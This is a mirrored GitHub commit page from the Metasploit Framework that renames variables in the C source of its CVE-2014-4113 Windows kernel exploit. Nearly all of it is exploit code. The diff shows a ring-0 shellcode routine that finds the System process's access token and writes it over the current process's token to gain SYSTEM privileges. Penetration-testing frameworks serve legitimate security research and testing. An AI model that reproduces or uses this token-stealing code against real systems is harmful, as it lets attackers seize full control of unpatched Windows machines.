github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
Code Releases Activity

Use hungarian notation

Browse Source
This commit is contained in:
jvazquez-r7 2014-10-31 12:47:50 -05:00
parent 8e547e27b3
commit 0c23733722
1 changed files with 17 additions and 17 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c vendored
View File

@ -146,28 +146,28 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
// Search the specified data structure for a member with CurrentValue.
BOOL find_and_replace_member(PMYWORD Structure,
MYWORD CurrentValue,
MYWORD NewValue,
MYWORD MaxSize)
BOOL find_and_replace_member(PMYWORD pdwStructure,
MYWORD dwCurrentValue,
MYWORD dwNewValue,
MYWORD dwMaxSize)
{
MYWORD i, Mask;
MYWORD dwIndex, dwMask;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
#ifdef _M_X64
Mask = ~0xf;
dwMask = ~0xf;
#else
Mask = ~7;
dwMask = ~7;
#endif
// Mask out the reference count.
CurrentValue &= Mask;
dwCurrentValue &= dwMask;
// Scan the structure for any occurrence of CurrentValue.
for (i = 0; i < MaxSize; i++) {
if ((Structure[i] & Mask) == CurrentValue) {
for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++) {
if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue) {
// And finally, replace it with NewValue.
Structure[i] = NewValue;
pdwStructure[dwIndex] = dwNewValue;
return TRUE;
}
}
@ -180,19 +180,19 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *pMyProcessInfo = NULL;
void *pSystemInfo = NULL;
PACCESS_TOKEN SystemToken;
PACCESS_TOKEN TargetToken;
PACCESS_TOKEN systemToken;
PACCESS_TOKEN targetToken;
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = pPsReferencePrimaryToken(pSystemInfo);
targetToken = pPsReferencePrimaryToken(pMyProcessInfo);
systemToken = pPsReferencePrimaryToken(pSystemInfo);
// Find the token in the target process, and replace with the system token.
find_and_replace_member((PMYWORD)pMyProcessInfo,
(MYWORD)TargetToken,
(MYWORD)SystemToken,
(MYWORD)targetToken,
(MYWORD)systemToken,
0x200);
return 0;
}